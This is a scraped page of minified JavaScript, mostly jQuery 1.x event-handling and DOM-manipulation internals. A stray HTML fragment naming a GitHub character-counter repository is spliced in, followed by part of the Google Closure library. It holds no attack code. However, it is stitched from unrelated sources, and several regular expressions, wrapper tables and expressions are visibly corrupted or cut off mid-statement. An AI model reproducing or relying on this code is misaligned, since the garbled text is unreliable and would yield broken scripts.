i||e.setAttributeNode(i=e.ownerDocument.createAttribute(r)),i.value=n+="","value"===r||n===e.getAttribute(r)?n:t}},x.expr.attrHandle.id=x.expr.attrHandle.name=x.expr.attrHandle.coords=function(e,n,r){var i;return r?t:(i=e.getAttributeNode(n))&&""!==i.value?i.value:null},x.valHooks.button={get:function(e,n){var r=e.getAttributeNode(n);return r&&r.specified?r.value:t},set:z.set},x.attrHooks.contenteditable={set:function(e,t,n){z.set(e,""===t?!1:t,n)}},x.each(["width","height"],function(e,n){x.attrHooks[n]={set:function(e,r){return""===r?(e.setAttribute(n,"auto"),r):t}}})),x.support.hrefNormalized||x.each(["href","src"],function(e,t){x.propHooks[t]={get:function(e){return e.getAttribute(t,4)}}}),x.support.style||(x.attrHooks.style={get:function(e){return e.style.cssText||t},set:function(e,t){return e.style.cssText=t+""}}),x.support.optSelected||(x.propHooks.selected={get:function(e){var t=e.parentNode;return t&&(t.selectedIndex,t.parentNode&&t.parentNode.selectedIndex),null}}),x.each(["tabIndex","readOnly","maxLength","cellSpacing","cellPadding","rowSpan","colSpan","useMap","frameBorder","contentEditable"],function(){x.propFix[this.toLowerCase()]=this}),x.support.enctype||(x.propFix.enctype="encoding"),x.each(["radio","checkbox"],function(){x.valHooks[this]={set:function(e,n){return x.isArray(n)?e.checked=x.inArray(x(e).val(),n)>=0:t}},x.support.checkOn||(x.valHooks[this].get=function(e){return null===e.getAttribute("value")?"on":e.value})});var Z=/^(?:input|select|textarea)$/i,et=/^key/,tt=/^(?:mouse|contextmenu)|click/,nt=/^(?:focusinfocus|focusoutblur)$/,rt=/^([^.]*)(?:\.(.+)|)$/;function it(){return!0}function ot(){return!1}function at(){try{return a.activeElement}catch(e){}}x.event={global:{},add:function(e,n,r,o,a){var s,l,u,c,p,f,d,h,g,m,y,v=x._data(e);if(v){r.handler&&(c=r,r=c.handler,a=c.selector),r.guid||(r.guid=x.guid++),(l=v.events)||(l=v.events={}),(f=v.handle)||(f=v.handle=function(e){return typeof x===i||e&&x.event.triggered===e.type?t:x.event.dispatch.apply(f.elem,arguments)},f.elem=e),n=(n||"").match(T)||[""],u=n.length;while(u--)s=rt.exec(n[u])||[],g=y=s[1],m=(s[2]||"").split(".").sort(),g&&(p=x.event.special[g]||{},g=(a?p.delegateType:p.bindType)||g,p=x.event.special[g]||{},d=x.extend({type:g,origType:y,data:o,handler:r,guid:r.guid,selector:a,needsContext:a&&x.expr.match.needsContext.test(a),namespace:m.join(".")},c),(h=l[g])||(h=l[g]=[],h.delegateCount=0,p.setup&&p.setup.call(e,o,m,f)!==!1||(e.addEventListener?e.addEventListener(g,f,!1):e.attachEvent&&e.attachEvent("on"+g,f))),p.add&&(p.add.call(e,d),d.handler.guid||(d.handler.guid=r.guid)),a?h.splice(h.delegateCount++,0,d):h.push(d),x.event.global[g]=!0);e=null}},remove:function(e,t,n,r,i){var o,a,s,l,u,c,p,f,d,h,g,m=x.hasData(e)&&x._data(e);if(m&&(c=m.events)){t=(t||"").match(T)||[""],u=t.length;while(u--)if(s=rt.exec(t[u])||[],d=g=s[1],h=(s[2]||"").split(".").sort(),d){p=x.event.special[d]||{},d=(r?p.delegateType:p.bindType)||d,f=c[d]||[],s=s[2]&&RegExp("(^|\\.)"+h.join("\\.(?:.*\\.|)")+"(\\.|$)"),l=o=f.length;while(o--)a=f[o],!i&&g!==a.origType||n&&n.guid!==a.guid||s&&!s.test(a.namespace)||r&&r!==a.selector&&("**"!==r||!a.selector)||(f.splice(o,1),a.selector&&f.delegateCount--,p.remove&&p.remove.call(e,a));l&&!f.length&&(p.teardown&&p.teardown.call(e,h,m.handle)!==!1||x.removeEvent(e,d,m.handle),delete c[d])}else for(d in c)x.event.remove(e,d+t[u],n,r,!0);x.isEmptyObject(c)&&(delete m.handle,x._removeData(e,"events"))}},trigger:function(n,r,i,o){var s,l,u,c,p,f,d,h=[i||a],g=v.call(n,"type")?n.type:n,m=v.call(n,"namespace")?n.namespace.split("."):[];if(u=f=i=i||a,3!==i.nodeType&&8!==i.nodeType&&!nt.test(g+x.event.triggered)&&(g.indexOf(".")>=0&&(m=g.split("."),g=m.shift(),m.sort()),l=0>g.indexOf(":")&&"on"+g,n=n[x.expando]?n:new x.Event(g,"object"==typeof n&&n),n.isTrigger=o?2:3,n.namespace=m.join("."),n.namespace_re=n.namespace?RegExp("(^|\\.)"+m.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,n.result=t,n.target||(n.target=i),r=null==r?[n]:x.makeArray(r,[n]),p=x.event.special[g]||{},o||!p.trigger||p.trigger.apply(i,r)!==!1)){if(!o&&!p.noBubble&&!x.isWindow(i)){for(c=p.delegateType||g,nt.test(c+g)||(u=u.parentNode);u;u=u.parentNode)h.push(u),f=u;f===(i.ownerDocument||a)&&h.push(f.defaultView||f.parentWindow||e)}d=0;while((u=h[d++])&&!n.isPropagationStopped())n.type=d>1?c:p.bindType||g,s=(x._data(u,"events")||{})[n.type]&&x._data(u,"handle"),s&&s.apply(u,r),s=l&&u[l],s&&x.acceptData(u)&&s.apply&&s.apply(u,r)===!1&&n.preventDefault();if(n.type=g,!o&&!n.isDefaultPrevented()&&(!p._default||p._default.apply(h.pop(),r)===!1)&&x.acceptData(i)&&l&&i[g]&&!x.isWindow(i)){f=i[l],f&&(i[l]=null),x.event.triggered=g;try{i[g]()}catch(y){}x.event.triggered=t,f&&(i[l]=f)}return n.result}},dispatch:function(e){e=x.event.fix(e);var n,r,i,o,a,s=[],l=g.call(arguments),u=(x._data(this,"events")||{})[e.type]||[],c=x.event.special[e.type]||{};if(l[0]=e,e.delegateTarget=this,!c.preDispatch||c.preDispatch.call(this,e)!==!1){s=x.event.handlers.call(this,e,u),n=0;while((o=s[n++])&&!e.isPropagationStopped()){e.currentTarget=o.elem,a=0;while((i=o.handlers[a++])&&!e.isImmediatePropagationStopped())(!e.namespace_re||e.namespace_re.test(i.namespace))&&(e.handleObj=i,e.data=i.data,r=((x.event.special[i.origType]||{}).handle||i.handler).apply(o.elem,l),r!==t&&(e.result=r)===!1&&(e.preventDefault(),e.stopPropagation()))}return c.postDispatch&&c.postDispatch.call(this,e),e.result}},handlers:function(e,n){var r,i,o,a,s=[],l=n.delegateCount,u=e.target;if(l&&u.nodeType&&(!e.button||"click"!==e.type))for(;u!=this;u=u.parentNode||this)if(1===u.nodeType&&(u.disabled!==!0||"click"!==e.type)){for(o=[],a=0;l>a;a++)i=n[a],r=i.selector+" ",o[r]===t&&(o[r]=i.needsContext?x(r,this).index(u)>=0:x.find(r,this,null,[u]).length),o[r]&&o.push(i);o.length&&s.push({elem:u,handlers:o})}return n.length>l&&s.push({elem:this,handlers:n.slice(l)}),s},fix:function(e){if(e[x.expando])return e;var t,n,r,i=e.type,o=e,s=this.fixHooks[i];s||(this.fixHooks[i]=s=tt.test(i)?this.mouseHooks:et.test(i)?this.keyHooks:{}),r=s.props?this.props.concat(s.props):this.props,e=new x.Event(o),t=r.length;while(t--)n=r[t],e[n]=o[n];return e.target||(e.target=o.srcElement||a),3===e.target.nodeType&&(e.target=e.target.parentNode),e.metaKey=!!e.metaKey,s.filter?s.filter(e,o):e},props:"altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(e,t){return null==e.which&&(e.which=null!=t.charCode?t.charCode:t.keyCode),e}},mouseHooks:{props:"button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(e,n){var r,i,o,s=n.button,l=n.fromElement;return null==e.pageX&&null!=n.clientX&&(i=e.target.ownerDocument||a,o=i.documentElement,r=i.body,e.pageX=n.clientX+(o&&o.scrollLeft||r&&r.scrollLeft||0)-(o&&o.clientLeft||r&&r.clientLeft||0),e.pageY=n.clientY+(o&&o.scrollTop||r&&r.scrollTop||0)-(o&&o.clientTop||r&&r.clientTop||0)),!e.relatedTarget&&l&&(e.relatedTarget=l===e.target?n.toElement:l),e.which||s===t||(e.which=1&s?1:2&s?3:4&s?2:0),e}},special:{load:{noBubble:!0},focus:{trigger:function(){if(this!==at()&&this.focus)try{return this.focus(),!1}catch(e){}},delegateType:"focusin"},blur:{trigger:function(){return this===at()&&this.blur?(this.blur(),!1):t},delegateType:"focusout"},click:{trigger:function(){return x.nodeName(this,"input")&&"checkbox"===this.type&&this.click?(this.click(),!1):t},_default:function(e){return x.nodeName(e.target,"a")}},beforeunload:{postDispatch:function(e){e.result!==t&&(e.originalEvent.returnValue=e.result)}}},simulate:function(e,t,n,r){var i=x.extend(new x.Event,n,{type:e,isSimulated:!0,originalEvent:{}});r?x.event.trigger(i,null,t):x.event.dispatch.call(t,i),i.isDefaultPrevented()&&n.preventDefault()}},x.removeEvent=a.removeEventListener?function(e,t,n){e.removeEventListener&&e.removeEventListener(t,n,!1)}:function(e,t,n){var r="on"+t;e.detachEvent&&(typeof e[r]===i&&(e[r]=null),e.detachEvent(r,n))},x.Event=function(e,n){return this instanceof x.Event?(e&&e.type?(this.originalEvent=e,this.type=e.type,this.isDefaultPrevented=e.defaultPrevented||e.returnValue===!1||e.getPreventDefault&&e.getPreventDefault()?it:ot):this.type=e,n&&x.extend(this,n),this.timeStamp=e&&e.timeStamp||x.now(),this[x.expando]=!0,t):new x.Event(e,n)},x.Event.prototype={isDefaultPrevented:ot,isPropagationStopped:ot,isImmediatePropagationStopped:ot,preventDefault:function(){var e=this.originalEvent;this.isDefaultPrevented=it,e&&(e.preventDefault?e.preventDefault():e.returnValue=!1)},stopPropagation:function(){var e=this.originalEvent;this.isPropagationStopped=it,e&&(e.stopPropagation&&e.stopPropagation(),e.cancelBubble=!0)},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=it,this.stopPropagation()}},x.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(e,t){x.event.special[e]={delegateType:t,bindType:t,handle:function(e){var n,r=this,i=e.relatedTarget,o=e.handleObj;return(!i||i!==r&&!x.contains(r,i))&&(e.type=o.origType,n=o.handler.apply(this,arguments),e.type=t),n}}}),x.support.submitBubbles||(x.event.special.submit={setup:function(){return x.nodeName(this,"form")?!1:(x.event.add(this,"click._submit keypress._submit",function(e){var n=e.target,r=x.nodeName(n,"input")||x.nodeName(n,"button")?n.form:t;r&&!x._data(r,"submitBubbles")&&(x.event.add(r,"submit._submit",function(e){e._submit_bubble=!0}),x._data(r,"submitBubbles",!0))}),t)},postDispatch:function(e){e._submit_bubble&&(delete e._submit_bubble,this.parentNode&&!e.isTrigger&&x.event.simulate("submit",this.parentNode,e,!0))},teardown:function(){return x.nodeName(this,"form")?!1:(x.event.remove(this,"._submit"),t)}}),x.support.changeBubbles||(x.event.special.change={setup:function(){return Z.test(this.nodeName)?(("checkbox"===this.type||"radio"===this.type)&&(x.event.add(this,"propertychange._change",function(e){"checked"===e.originalEvent.propertyName&&(this._just_changed=!0)}),x.event.add(this,"click._change",function(e){this._just_changed&&!e.isTrigger&&(this._just_changed=!1),x.event.simulate("change",this,e,!0)})),!1):(x.event.add(this,"beforeactivate._change",function(e){var t=e.target;Z.test(t.nodeName)&&!x._data(t,"changeBubbles")&&(x.event.add(t,"change._change",function(e){!this.parentNode||e.isSimulated||e.isTrigger||x.event.simulate("change",this.parentNode,e,!0)}),x._data(t,"changeBubbles",!0))}),t)},handle:function(e){var n=e.target;return this!==n||e.isSimulated||e.isTrigger||"radio"!==n.type&&"checkbox"!==n.type?e.handleObj.handler.apply(this,arguments):t},teardown:function(){return x.event.remove(this,"._change"),!Z.test(this.nodeName)}}),x.support.focusinBubbles||x.each({focus:"focusin",blur:"focusout"},function(e,t){var n=0,r=function(e){x.event.simulate(t,e.target,x.event.fix(e),!0)};x.event.special[t]={setup:function(){0===n++&&a.addEventListener(e,r,!0)},teardown:function(){0===--n&&a.removeEventListener(e,r,!0)}}}),x.fn.extend({on:function(e,n,r,i,o){var a,s;if("object"==typeof e){"string"!=typeof n&&(r=r||n,n=t);for(a in e)this.on(a,n,r,e[a],o);return this}if(null==r&&null==i?(i=n,r=n=t):null==i&&("string"==typeof n?(i=r,r=t):(i=r,r=n,n=t)),i===!1)i=ot;else if(!i)return this;return 1===o&&(s=i,i=function(e){return x().off(e),s.apply(this,arguments)},i.guid=s.guid||(s.guid=x.guid++)),this.each(function(){x.event.add(this,e,i,r,n)})},one:function(e,t,n,r){return this.on(e,t,n,r,1)},off:function(e,n,r){var i,o;if(e&&e.preventDefault&&e.handleObj)return i=e.handleObj,x(e.delegateTarget).off(i.namespace?i.origType+"."+i.namespace:i.origType,i.selector,i.handler),this;if("object"==typeof e){for(o in e)this.off(o,n,e[o]);return this}return(n===!1||"function"==typeof n)&&(r=n,n=t),r===!1&&(r=ot),this.each(function(){x.event.remove(this,e,r,n)})},trigger:function(e,t){return this.each(function(){x.event.trigger(e,t,this)})},triggerHandler:function(e,n){var r=this[0];return r?x.event.trigger(e,n,r,!0):t}});var st=/^.[^:#\[\.,]*$/,lt=/^(?:parents|prev(?:Until|All))/,ut=x.expr.match.needsContext,ct={children:!0,contents:!0,next:!0,prev:!0};x.fn.extend({find:function(e){var t,n=[],r=this,i=r.length;if("string"!=typeof e)return this.pushStack(x(e).filter(function(){for(t=0;i>t;t++)if(x.contains(r[t],this))return!0}));for(t=0;i>t;t++)x.find(e,r[t],n);return n=this.pushStack(i>1?x.unique(n):n),n.selector=this.selector?this.selector+" "+e:e,n},has:function(e){var t,n=x(e,this),r=n.length;return this.filter(function(){for(t=0;r>t;t++)if(x.contains(this,n[t]))return!0})},not:function(e){return this.pushStack(ft(this,e||[],!0))},filter:function(e){return this.pushStack(ft(this,e||[],!1))},is:function(e){return!!ft(this,"string"==typeof e&&ut.test(e)?x(e):e||[],!1).length},closest:function(e,t){var n,r=0,i=this.length,o=[],a=ut.test(e)||"string"!=typeof e?x(e,t||this.context):0;for(;i>r;r++)for(n=this[r];n&&n!==t;n=n.parentNode)if(11>n.nodeType&&(a?a.index(n)>-1:1===n.nodeType&&x.find.matchesSelector(n,e))){n=o.push(n);break}return this.pushStack(o.length>1?x.unique(o):o)},index:function(e){return e?"string"==typeof e?x.inArray(this[0],x(e)):x.inArray(e.jquery?e[0]:e,this):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(e,t){var n="string"==typeof e?x(e,t):x.makeArray(e&&e.nodeType?[e]:e),r=x.merge(this.get(),n);return this.pushStack(x.unique(r))},addBack:function(e){return this.add(null==e?this.prevObject:this.prevObject.filter(e))}});function pt(e,t){do e=e[t];while(e&&1!==e.nodeType);return e}x.each({parent:function(e){var t=e.parentNode;return t&&11!==t.nodeType?t:null},parents:function(e){return x.dir(e,"parentNode")},parentsUntil:function(e,t,n){return x.dir(e,"parentNode",n)},next:function(e){return pt(e,"nextSibling")},prev:function(e){return pt(e,"previousSibling")},nextAll:function(e){return x.dir(e,"nextSibling")},prevAll:function(e){return x.dir(e,"previousSibling")},nextUntil:function(e,t,n){return x.dir(e,"nextSibling",n)},prevUntil:function(e,t,n){return x.dir(e,"previousSibling",n)},siblings:function(e){return x.sibling((e.parentNode||{}).firstChild,e)},children:function(e){return x.sibling(e.firstChild)},contents:function(e){return x.nodeName(e,"iframe")?e.contentDocument||e.contentWindow.document:x.merge([],e.childNodes)}},function(e,t){x.fn[e]=function(n,r){var i=x.map(this,t,n);return"Until"!==e.slice(-5)&&(r=n),r&&"string"==typeof r&&(i=x.filter(r,i)),this.length>1&&(ct[e]||(i=x.unique(i)),lt.test(e)&&(i=i.reverse())),this.pushStack(i)}}),x.extend({filter:function(e,t,n){var r=t[0];return n&&(e=":not("+e+")"),1===t.length&&1===r.nodeType?x.find.matchesSelector(r,e)?[r]:[]:x.find.matches(e,x.grep(t,function(e){return 1===e.nodeType}))},dir:function(e,n,r){var i=[],o=e[n];while(o&&9!==o.nodeType&&(r===t||1!==o.nodeType||!x(o).is(r)))1===o.nodeType&&i.push(o),o=o[n];return i},sibling:function(e,t){var n=[];for(;e;e=e.nextSibling)1===e.nodeType&&e!==t&&n.push(e);return n}});function ft(e,t,n){if(x.isFunction(t))return x.grep(e,function(e,r){return!!t.call(e,r,e)!==n});if(t.nodeType)return x.grep(e,function(e){return e===t!==n});if("string"==typeof t){if(st.test(t))return x.filter(t,e,n);t=x.filter(t,e)}return x.grep(e,function(e){return x.inArray(e,t)>=0!==n})}function dt(e){var t=ht.split("|"),n=e.createDocumentFragment();if(n.createElement)while(t.length)n.createElement(t.pop());return n}var ht="abbr|article|aside|audio|bdi|canvas|data|datalist|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",gt=/ jQuery\d+="(?:null|\d+)"/g,mt=RegExp("<(?:"+ht+")[\\s/>]","i"),yt=/^\s+/,vt=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,bt=/<([\w:]+)/,xt=/
\s*$/g,At={option:[1,""," "],legend:[1,""," "],area:[1,""," "],param:[1,""," "],thead:[1,""],tr:[2,""],col:[2,""],td:[3,""],_default:x.support.htmlSerialize?[0,"",""]:[1,"X","
"]},jt=dt(a),Dt=jt.appendChild(a.createElement("div"));At.optgroup=At.option,At.tbody=At.tfoot=At.colgroup=At.caption=At.thead,At.th=At.td,x.fn.extend({text:function(e){return x.access(this,function(e){return e===t?x.text(this):this.empty().append((this[0]&&this[0].ownerDocument||a).createTextNode(e))},null,e,arguments.length)},append:function(){return this.domManip(arguments,function(e){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var t=Lt(this,e);t.appendChild(e)}})},prepend:function(){return this.domManip(arguments,function(e){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var t=Lt(this,e);t.insertBefore(e,t.firstChild)}})},before:function(){return this.domManip(arguments,function(e){this.parentNode&&this.parentNode.insertBefore(e,this)})},after:function(){return this.domManip(arguments,function(e){this.parentNode&&this.parentNode.insertBefore(e,this.nextSibling)})},remove:function(e,t){var n,r=e?x.filter(e,this):this,i=0;for(;null!=(n=r[i]);i++)t||1!==n.nodeType||x.cleanData(Ft(n)),n.parentNode&&(t&&x.contains(n.ownerDocument,n)&&_t(Ft(n,"script")),n.parentNode.removeChild(n));return this},empty:function(){var e,t=0;for(;null!=(e=this[t]);t++){1===e.nodeType&&x.cleanData(Ft(e,!1));while(e.firstChild)e.removeChild(e.firstChild);e.options&&x.nodeName(e,"select")&&(e.options.length=0)}return this},clone:function(e,t){return e=null==e?!1:e,t=null==t?e:t,this.map(function(){return x.clone(this,e,t)})},html:function(e){return x.access(this,function(e){var n=this[0]||{},r=0,i=this.length;if(e===t)return 1===n.nodeType?n.innerHTML.replace(gt,""):t;if(!("string"!=typeof e||Tt.test(e)||!x.support.htmlSerialize&&mt.test(e)||!x.support.leadingWhitespace&&yt.test(e)||At[(bt.exec(e)||["",""])[1].toLowerCase()])){e=e.replace(vt,"<$1>$2>");try{for(;i>r;r++)n=this[r]||{},1===n.nodeType&&(x.cleanData(Ft(n,!1)),n.innerHTML=e);n=0}catch(o){}}n&&this.empty().append(e)},null,e,arguments.length)},replaceWith:function(){var e=x.map(this,function(e){return[e.nextSibling,e.parentNode]}),t=0;return this.domManip(arguments,function(n){var r=e[t++],i=e[t++];i&&(r&&r.parentNode!==i&&(r=this.nextSibling),x(this).remove(),i.insertBefore(n,r))},!0),t?this:this.remove()},detach:function(e){return this.remove(e,!0)},domManip:function(e,t,n){e=d.apply([],e);var r,i,o,a,s,l,u=0,c=this.length,p=this,f=c-1,h=e[0],g=x.isFunction(h);if(g||!(1>=c||"string"!=typeof h||x.support.checkClone)&&Nt.test(h))return this.each(function(r){var i=p.eq(r);g&&(e[0]=h.call(this,r,i.html())),i.domManip(e,t,n)});if(c&&(l=x.buildFragment(e,this[0].ownerDocument,!1,!n&&this),r=l.firstChild,1===l.childNodes.length&&(l=r),r)){for(a=x.map(Ft(l,"script"),Ht),o=a.length;c>u;u++)i=l,u!==f&&(i=x.clone(i,!0,!0),o&&x.merge(a,Ft(i,"script"))),t.call(this[u],i,u);if(o)for(s=a[a.length-1].ownerDocument,x.map(a,qt),u=0;o>u;u++)i=a[u],kt.test(i.type||"")&&!x._data(i,"globalEval")&&x.contains(s,i)&&(i.src?x._evalUrl(i.src):x.globalEval((i.text||i.textContent||i.innerHTML||"").replace(St,"")));l=r=null}return this}});function Lt(e,t){return x.nodeName(e,"table")&&x.nodeName(1===t.nodeType?t:t.firstChild,"tr")?e.getElementsByTagName("tbody")[0]||e.appendChild(e.ownerDocument.createElement("tbody")):e}function Ht(e){return e.type=(null!==x.find.attr(e,"type"))+"/"+e.type,e}function qt(e){var t=Et.exec(e.type);return t?e.type=t[1]:e.removeAttribute("type"),e}function _t(e,t){var n,r=0;for(;null!=(n=e[r]);r++)x._data(n,"globalEval",!t||x._data(t[r],"globalEval"))}function Mt(e,t){if(1===t.nodeType&&x.hasData(e)){var n,r,i,o=x._data(e),a=x._data(t,o),s=o.events;if(s){delete a.handle,a.events={};for(n in s)for(r=0,i=s[n].length;i>r;r++)x.event.add(t,n,s[n][r])}a.data&&(a.data=x.extend({},a.data))}}function Ot(e,t){var n,r,i;if(1===t.nodeType){if(n=t.nodeName.toLowerCase(),!x.support.noCloneEvent&&t[x.expando]){i=x._data(t);for(r in i.events)x.removeEvent(t,r,i.handle);t.removeAttribute(x.expando)}"script"===n&&t.text!==e.text?(Ht(t).text=e.text,qt(t)):"object"===n?(t.parentNode&&(t.outerHTML=e.outerHTML),x.support.html5Clone&&e.innerHTML&&!x.trim(t.innerHTML)&&(t.innerHTML=e.innerHTML)):"input"===n&&Ct.test(e.type)?(t.defaultChecked=t.checked=e.checked,t.value!==e.value&&(t.value=e.value)):"option"===n?t.defaultSelected=t.selected=e.defaultSelected:("input"===n||"textarea"===n)&&(t.defaultValue=e.defaultValue)}}x.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(e,t){x.fn[e]=function(e){var n,r=0,i=[],o=x(e),a=o.length-1;for(;a>=r;r++)n=r===a?this:this.clone(!0),x(o[r])[t](n),h.apply(i,n.get());return this.pushStack(i)}});function Ft(e,n){var r,o,a=0,s=typeof e.getElementsByTagName!==i?e.getElementsByTagName(n||"*"):typeof e.querySelectorAll!==i?e.querySelectorAll(n||"*"):t;if(!s)for(s=[],r=e.childNodes||e;null!=(o=r[a]);a++)!n||x.nodeName(o,n)?s.push(o):x.merge(s,Ft(o,n));return n===t||n&&x.nodeName(e,n)?x.merge([e],s):s}function Bt(e){Ct.test(e.type)&&(e.defaultChecked=e.checked)}x.extend({clone:function(e,t,n){var r,i,o,a,s,l=x.contains(e.ownerDocument,e);if(x.support.html5Clone||x.isXMLDoc(e)||!mt.test("<"+e.nodeName+">")?o=e.cloneNode(!0):(Dt.innerHTML=e.outerHTML,Dt.removeChild(o=Dt.firstChild)),!(x.support.noCloneEvent&&x.support.noCloneChecked||1!==e.nodeType&&11!==e.nodeType||x.isXMLDoc(e)))for(r=Ft(o),s=Ft(e),a=0;null!=(i=s[a]);++a)r[a]&&Ot(i,r[a]);if(t)if(n)for(s=s||Ft(e),r=r||Ft(o),a=0;null!=(i=s[a]);a++)Mt(i,r[a]);else Mt(e,o);return r=Ft(o,"script"),r.length>0&&_t(r,!l&&Ft(e,"script")),r=s=i=null,o},buildFragment:function(e,t,n,r){var i,o,a,s,l,u,c,p=e.length,f=dt(t),d=[],h=0;for(;p>h;h++)if(o=e[h],o||0===o)if("object"===x.type(o))x.merge(d,o.nodeType?[o]:o);else if(wt.test(o)){s=s||f.appendChild(t.createElement("div")),l=(bt.exec(o)||["",""])[1].toLowerCase(),c=At[l]||At._default,s.innerHTML=c[1]+o.replace(vt,"<$1>$2>")+c[2],i=c[0];while(i--)s=s.lastChild;if(!x.support.leadingWhitespace&&yt.test(o)&&d.push(t.createTextNode(yt.exec(o)[0])),!x.support.tbody){o="table"!==l||xt.test(o)?""!==c[1]||xt.test(o)?0:s:s.firstChild,i=o&&o.childNodes.length;while(i--)x.nodeName(u=o.childNodes[i],"tbody")&&!u.childNodes.length&&o.removeChild(u)}x.merge(d,s.childNodes),s.textContent="";while(s.firstChild)s.removeChild(s.firstChild);s=f.lastChild}else d.push(t.createTextNode(o));s&&f.removeChild(s),x.support.appendChecked||x.grep(Ft(d,"input"),Bt),h=0;while(o=d[h++])if((!r||-1===x.inArray(o,r))&&(a=x.contains(o.ownerDocument,o),s=Ft(f.appendChild(o),"script"),a&&_t(s),n)){i=0;while(o=s[i++])kt.test(o.type||"")&&n.push(o)}return s=null,f},cleanData:function(e,t){var n,r,o,a,s=0,l=x.expando,u=x.cache,c=x.support.deleteExpando,f=x.event.special;for(;null!=(n=e[s]);s++)if((t||x.acceptData(n))&&(o=n[l],a=o&&u[o])){if(a.events)for(r in a.events)f[r]?x.event.remove(n,r):x.removeEvent(n,r,a.handle); u[o]&&(delete u[o],c?delete n[l]:typeof n.removeAttribute!==i?n.removeAttribute(l):n[l]=null,p.push(o))}},_evalUrl:function(e){return x.ajax({url:e,type:"GET",dataType:"script",async:!1,global:!1,"throws":!0})}}),x.fn.extend({wrapAll:function(e){if(x.isFunction(e))return this.each(function(t){x(this).wrapAll(e.call(this,t))});if(this[0]){var t=x(e,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&t.insertBefore(this[0]),t.map(function(){var e=this;while(e.firstChild&&1===e.firstChild.nodeType)e=e.firstChild;return e}).append(this)}return this},wrapInner:function(e){return x.isFunction(e)?this.each(function(t){x(this).wrapInner(e.call(this,t))}):this.each(function(){var t=x(this),n=t.contents();n.length?n.wrapAll(e):t.append(e)})},wrap:function(e){var t=x.isFunction(e);return this.each(function(n){x(this).wrapAll(t?e.call(this,n):e)})},unwrap:function(){return this.parent().each(function(){x.nodeName(this,"body")||x(this).replaceWith(this.childNodes)}).end()}});var Pt,Rt,Wt,$t=/alpha\([^)]*\)/i,It=/opacity\s*=" class="topic-tag topic-tag-link">
NilotpalSenChowdhury/character-counter-Detect-Copy-Paste-
>>0);_.Oa=Date.now||function(){return+new Date};_.w=function(a,b){a=a.split(".");var c=_.m;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)!a.length&&_.r(b)?c[d]=b:c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}}; _.B=function(a,b){function c(){}c.prototype=b.prototype;a.H=b.prototype;a.prototype=new c;a.prototype.constructor=a;a.gp=function(a,c,f){for(var d=Array(arguments.length-2),e=2;ec&&(c=Math.max(0,a.length+c));if(_.v(a))return _.v(b)&&1==b.length?a.lastIndexOf(b,c):-1;for(;0<=c;c--)if(c in a&&a[c]===b)return c;return-1}; _.jb=Array.prototype.forEach?function(a,b,c){Array.prototype.forEach.call(a,b,c)}:function(a,b,c){for(var d=a.length,e=_.v(a)?a.split(""):a,f=0;fb?1:0};_.xb=2147483648*Math.random()|0; a:{var Bb=_.m.navigator;if(Bb){var Cb=Bb.userAgent;if(Cb){_.yb=Cb;break a}}_.yb=""}_.Db=function(a){return-1!=_.yb.indexOf(a)};var Fb;_.Eb=function(a,b,c){for(var d in a)b.call(c,a[d],d,a)};Fb="constructor hasOwnProperty isPrototypeOf propertyIsEnumerable toLocaleString toString valueOf".split(" ");_.Gb=function(a,b){for(var c,d,e=1;e(0,window.parseFloat)(hc)){gc=String(jc);break a}}gc=hc}_.kc=gc;Ob={}; _.lc=function(a){return Pb(a,function(){return 0<=_.ub(_.kc,a)})};_.nc=function(a){return Number(_.mc)>=a};var pc=_.m.document;oc=pc&&_.D?fc()||("CSS1Compat"==pc.compatMode?(0,window.parseInt)(_.kc,10):5):void 0;_.mc=oc; var rc,vc,wc,xc,yc,zc,Ac,Bc;_.qc=function(a,b){return _.ca[a]=b};_.sc=function(a){return Array.prototype.concat.apply([],arguments)};_.tc=function(a){var b=a.length;if(0 /g;yc=/"/g;zc=/'/g;Ac=/\x00/g;Bc=/[\x00&<>"']/; _.Cc=function(a){if(!Bc.test(a))return a;-1!=a.indexOf("&")&&(a=a.replace(vc,"&"));-1!=a.indexOf("<")&&(a=a.replace(wc,"<"));-1!=a.indexOf(">")&&(a=a.replace(xc,">"));-1!=a.indexOf('"')&&(a=a.replace(yc,"""));-1!=a.indexOf("'")&&(a=a.replace(zc,"'"));-1!=a.indexOf("\x00")&&(a=a.replace(Ac,""));return a};_.Dc=function(a){return String(a).replace(/\-([a-z])/g,function(a,c){return c.toUpperCase()})};_.Ec=function(a,b){for(var c in a)if(a[c]==b)return!0;return!1}; var Fc,Hc;Fc=!_.D||_.nc(9);Hc=!_.Vb&&!_.D||_.D&&_.nc(9)||_.Vb&&_.lc("1.9.1");_.Ic=_.D&&!_.lc("9");_.Jc=_.D||_.Qb||_.Wb;_.Kc=_.D&&!_.nc(9);var Lc;_.Mc=function(){this.Dw="";this.LP=Lc};_.Mc.prototype.Bh=!0;_.Mc.prototype.$f=function(){return this.Dw};_.Mc.prototype.toString=function(){return"Const{"+this.Dw+"}"};_.Nc=function(a){return a instanceof _.Mc&&a.constructor===_.Mc&&a.LP===Lc?a.Dw:"type_error:Const"};Lc={};_.Oc=function(a){var b=new _.Mc;b.Dw=a;return b};_.Oc(""); var Pc;_.Qc=function(){this.dC="";this.VP=Pc};_.Qc.prototype.Bh=!0;_.Qc.prototype.$f=function(){return this.dC};_.Qc.prototype.KA=!0;_.Qc.prototype.ql=function(){return 1};_.Rc=function(a){if(a instanceof _.Qc&&a.constructor===_.Qc&&a.VP===Pc)return a.dC;_.La(a);return"type_error:TrustedResourceUrl"};_.Tc=function(a){return _.Sc(_.Nc(a))};Pc={};_.Sc=function(a){var b=new _.Qc;b.dC=a;return b}; var 